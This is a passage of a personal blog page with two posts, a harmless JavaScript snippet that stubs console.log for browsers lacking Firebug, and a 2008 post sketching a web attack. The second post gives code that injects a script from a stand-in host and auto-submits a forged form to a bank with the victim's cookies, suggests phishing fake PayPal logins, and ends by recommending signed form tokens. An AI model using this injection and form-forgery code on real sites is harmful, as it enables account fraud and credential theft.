Archives

February 2010 (1)
September 2009 (1)
May 2009 (1)
April 2009 (1)
March 2009 (4)
January 2009 (3)

November 2008 (2)
October 2008 (2)
September 2008 (1)
August 2008 (5)
July 2008 (3)
June 2008 (1)
May 2008 (5)
April 2008 (8)
March 2008 (3)
February 2008 (1)
January 2008 (2)

December 2007 (2)
November 2007 (4)
October 2007 (17)
September 2007 (9)

Using Firebug’s console without fear

Thursday, February 04 2010

I love Firebug, and I especially love sprinking console.log calls around the place, but I hate the way things break when you forget to remove them and your code hits a browser without Firebug installed.

    if (typeof console === 'undefined') {
        var console = {}; // For once not having block scoping is kind of handy
        console.log = function () {};
    };
    
    console.log("It's safe to use console.log");

I feel there ought to be a smarter way of doing this but I just can’t think of one.

no comments

Tags: javascript ~ firebug ~ catalyst

Naughtiness in three easy steps.

Wednesday, August 20 2008

First, insert your code into a page from a.example.com. XSS via SQL injection is probably the right way.

var sc = document.createElement('script');
sc.setAttribute('type','text/javascript');
sc.setAttribute('src','http://b.example.com/naughty.js');
document.getElementsByTagName("head")[0].appendChild(sc);

Second, insert the code of your choice into the DOM from http://b.example.com/naughty.js. That’s a nice-to-have; you could have put this in the first script:

var badform = document.createElement('FORM');
document.body.appendChild(badform);
// ... add appropriate fields to badform here
badform.action="http://tastybank.example.com";
badform.method = "POST"; // note that existing cookies for tastybank in this session will be sent
var f = function () {badform.submit(); return false};
f(); // we could make this an event handler on one or more DOM elements so the user really does it to themselves

Third, um, er, PROFIT.

But we don’t have to go as far as POSTing to another site. For example, suppose on inspecting a user’s history we notice they visited their PayPal account earlier. Why not redirect to a fake PayPal screen, and ask them to log in again? Quite a large proportion of users will hand over their credentials. You can harvest them and then redirect to a real PayPal screen. The possibilities are endless.

Or you can just write a Flash applet with cute kittens and do anything you want from there—I hear the Flash sandbox is kind of lax, and how else will we order Hell Pizza?.

If you own TastyBank (or PayPal) the right thing to do is put signed unique tokens in all your forms and reject any forms that don’t have a valid token. Because there are more shitty PHP forum apps out there on popular sites than we will ever be able to track down and fix.

no comments

Tags: security ~ javascript ~ DOM

Recent comments

Rendered at 2010-03-14 07:06:56